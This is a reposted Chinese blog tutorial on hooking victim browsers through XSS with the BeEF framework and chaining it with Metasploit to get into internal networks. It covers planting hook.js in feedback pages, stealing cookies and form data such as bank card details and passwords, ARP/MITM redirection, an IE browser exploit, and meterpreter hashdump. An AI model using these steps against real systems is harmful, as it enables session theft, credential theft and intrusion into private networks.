您的位置:首页 > 其它

内网渗透一:利用Xss漏洞进入内网

2015-11-17 23:49 573 查看
0x01:科普

Beef目前欧美最流行的WEB框架攻击平台,全称:The Browser Exploitation Framework Project. Beef利用简单的XSS漏洞,通过一段编写好的JavaScript(hook.js)控制目标主机的浏览器,通过目标主机浏览器获得该主机的详细信息,并进一步扫描内网,配合metasploit绝对是内网渗透一大杀器。

0x02安装

Kali linux 系统默认未安装beef,需要自行安装。

?
0x03入门

0x03.1启动

主目录:

/usr/share/beef-xss

?




127.0.0.1:3000/ui/pannel

账号密码

beef/beef



demos:Beef-Xss ip:3000/demos/butcher/index.html

测试两台主机网络通信是否正常:



访问Beef demo页面



demo页面嵌入了hook.js 访问->中招

0x04挂马:

在正常页面添加script标签,嵌入恶意脚本



在实际渗透中(需要一个公网的IP),如何让受害者访问我们嵌有hook.js的页面呢?

网站反馈页面,举报页面案例:用Xss平台沦陷百度投诉中心后台

当然,这位同学用的是Xss平台,而不是beef,利用Beef的话,不仅能得到后台管理员的Cookie,再配合Metasploit,还能以管理员主机浏览器当做跳板,进入公司内网。

Online Browersers->右击->Use As Proxy



再配合ARP攻击,MITM中间人攻击,对内网内所有Http请求重定向基本...(这里露出一个你懂的WS笑容)

Beef后台检测到有主机上线(感觉好像当年玩的灰鸽子、上兴 =。= 囧)



通过浏览器,我们可以看到目标主机的很多信息:

浏览器信息:

名称

版本

Browser UA String

Browser Platform

Windows size

插件基本信息:

Flash

VBS脚本

Web Sock

Quick Time

...

Api信息

Cookie

操作系统信息

Date 时间日期

硬件信息

Cpu (32/64)

屏幕分辨率

是否支持触屏

And So On

用火狐浏览器测试





Beef功能模块组件



常用功能/模块

1 2 3 4 5 Browser:获取浏览器信息 --Hooked Domain -----Get Cookie 获取客户端Cookie信息 执行一次命令在右边显示Cookie; -----Get From Value 获取页面提交的表单信息:截获填写的银行卡信息、注册页面的用户名密码; -----Redirect Browser 浏览器重定向



执行后,目标浏览器访问任何网站都将会被重定向到bobao.360.cn,实际渗透的时候在内网实施ARP攻击,将内网所有Http请求流量重定向到嵌入了Hook恶意脚本的页面...(在这里露出一个淫荡的笑容)

Chrome Extensions:

Debug:测试Http请求

Exploits:利用浏览器漏洞进行攻击

Host:获取受害者主机信息

Mtasploit:结合Metasploit进行渗透,这个也是本文的重点。

Network:进行Doser、ping、DNS枚举、端口扫描等等

Social Enhineering:社工模块

0x05与Metasploit联动

Beef配置文件

/usr/share/beef-xss
/config.yaml

?
改成

?
?
?
修改 host callback_host两参数,改为beef主机IP

重启postgresq、metasploit、服务
service postgresql restart & service metasploit restart



msfconsole #启动Metasploit 1 load msgrpc ServerHost=172.16.244.129 Pass=abc123



重启Beef



启动beef这里提示已经载入246个metasploit的EXP,MSF更新到最新版应该有五六百个EXP

进入Beef后台(莫名成了245 =。=!)



use exploit/windows/browser/ie_execcommand_uaf

show options

set srvhost 172.16.244.129

exploit/run





靶机被强行跳转到被监听的URL



MSF成功监听到(但,貌似是虚拟机装的XP把这个漏洞补了,所以没产生session会话)



如果XP没有打补丁,即存在这个EXP针对的漏洞,这里会产生一个session会话
session -i 1



screenshot 截屏:截取遭钓鱼主机的屏幕到本地文件

sysinfo 查看系统信息

hashdump dump目标主机的用户Hash
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: